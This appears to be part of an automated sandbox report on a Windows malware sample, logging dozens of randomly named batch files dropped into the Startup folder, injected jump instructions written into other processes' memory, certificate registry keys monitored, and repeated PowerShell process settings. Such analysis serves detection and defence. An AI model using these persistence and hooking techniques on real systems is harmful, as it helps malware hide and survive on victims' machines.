Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zc1Hpjg06kEPCxYidXtEteEN.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kjutPwsIKLqBhucfBslkDjha.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ojtScMFaD01HvY9V5pRywyo4.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rEEjiqeukO2VRDjzOoMgF5Q1.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PenbNlY4v1Vx62WE0q81zcDp.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xUwcy6wbvWLGo9dph4cGTShV.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I5UVn2ElA1TC7bAAmh5QM3ft.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\O46ClWDJJ0ChccNYUTHhX6rG.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TesNDksP9JpUl8dcPzgHr5lv.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uomg7UlX27UwbG3UUxP7ZMNG.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LUsq7upEG2iiN4NxycmpIBDM.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9DzcdBj68Lp4dGPdGwvZEsfD.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xzk1C1rQiwgJE4mEfBRZiYfJ.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\y2xUHCgSGKPsCWSBr4ueFeFq.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2jNh70feoWdNeZn43S0Jdfru.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cic3atRc7HSpHHcbjylG6maa.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IytYR3GaQ4RFrbtAYXGTLQtf.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ElrigHO2FOmeuoC12a7pqHAf.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\18MDOkFiY6RdLnWW80t2YsVS.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EygRHTeIn4ytbQctqBrMquUw.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L5TEYLaQFPYWqJgYXoDmRWNi.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uoKc3jku73co21M6XP2XzBRm.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0JbGAE3KWGgTpIlSSHYLLbge.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XTYZUGwZm67eusiXt60bjnqI.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RXXz6AwumQHorbsNNmZw4Pww.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kEBolTmB6JUkmTcImCo9ZSC6.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mBxCGAyk3eKGc4MZLyYxeLOy.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vDK8Bjmbw8F7jtFi7BU7EIjV.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5QDpHdUdPGqfrvwvPMstJLuM.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2MEjFMZug16QWjxKckULCLHU.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jWFEGUWi14gR1AWFpLYSOhTH.bat	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LwUEIn0u42avRg7NWL5JGs75.bat

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Memory written: PID: 6080 base: 7FF9082F0005 value: E9 CB 05 E7 FF
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Memory written: PID: 6080 base: 7FF9081605D0 value: E9 3A FA 18 00
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Memory written: PID: 6080 base: 7FF908300005 value: E9 9B 07 E1 FF
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Memory written: PID: 6080 base: 7FF9081107A0 value: E9 6A F8 1E 00
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Memory written: PID: 6080 base: 7FF907CF0007 value: E9 AB 11 DF FF
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Memory written: PID: 6080 base: 7FF907AE11B0 value: E9 5E EE 20 00
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Memory written: PID: 6080 base: 7FF907D00006 value: E9 BB 7F DB FF
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Memory written: PID: 6080 base: 7FF907AB7FC0 value: E9 4C 80 24 00
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Memory written: PID: 6080 base: 7FF906100007 value: E9 CB E3 C9 FF
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Memory written: PID: 6080 base: 7FF905D9E3D0 value: E9 3E 1C 36 00
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Memory written: PID: 6080 base: 7FF906110006 value: E9 AB 4D B9 FF
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Memory written: PID: 6080 base: 7FF905CA4DB0 value: E9 5C B2 46 00
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Memory written: PID: 7480 base: 7FF9082F0005 value: E9 CB 05 E7 FF
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Memory written: PID: 7480 base: 7FF9081605D0 value: E9 3A FA 18 00
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Memory written: PID: 7480 base: 7FF908300005 value: E9 9B 07 E1 FF
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Memory written: PID: 7480 base: 7FF9081107A0 value: E9 6A F8 1E 00
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Memory written: PID: 7480 base: 7FF907CF0007 value: E9 AB 11 DF FF
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Memory written: PID: 7480 base: 7FF907AE11B0 value: E9 5E EE 20 00
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Memory written: PID: 7480 base: 7FF907D00006 value: E9 BB 7F DB FF
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Memory written: PID: 7480 base: 7FF907AB7FC0 value: E9 4C 80 24 00
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Memory written: PID: 7480 base: 7FF906100007 value: E9 CB E3 C9 FF
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Memory written: PID: 7480 base: 7FF905D9E3D0 value: E9 3E 1C 36 00
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Memory written: PID: 7480 base: 7FF906110006 value: E9 AB 4D B9 FF
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	Memory written: PID: 7480 base: 7FF905CA4DB0 value: E9 5C B2 46 00
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Memory written: PID: 8188 base: 7FF9082F0005 value: E9 CB 05 E7 FF
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Memory written: PID: 8188 base: 7FF9081605D0 value: E9 3A FA 18 00
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Memory written: PID: 8188 base: 7FF908300005 value: E9 9B 07 E1 FF
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Memory written: PID: 8188 base: 7FF9081107A0 value: E9 6A F8 1E 00
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Memory written: PID: 8188 base: 7FF907CF0007 value: E9 AB 11 DF FF
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Memory written: PID: 8188 base: 7FF907AE11B0 value: E9 5E EE 20 00
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Memory written: PID: 8188 base: 7FF907D00006 value: E9 BB 7F DB FF
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Memory written: PID: 8188 base: 7FF907AB7FC0 value: E9 4C 80 24 00
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Memory written: PID: 8188 base: 7FF906100007 value: E9 CB E3 C9 FF
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Memory written: PID: 8188 base: 7FF905D9E3D0 value: E9 3E 1C 36 00
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Memory written: PID: 8188 base: 7FF906110006 value: E9 AB 4D B9 FF
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	Memory written: PID: 8188 base: 7FF905CA4DB0 value: E9 5C B2 46 00

Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
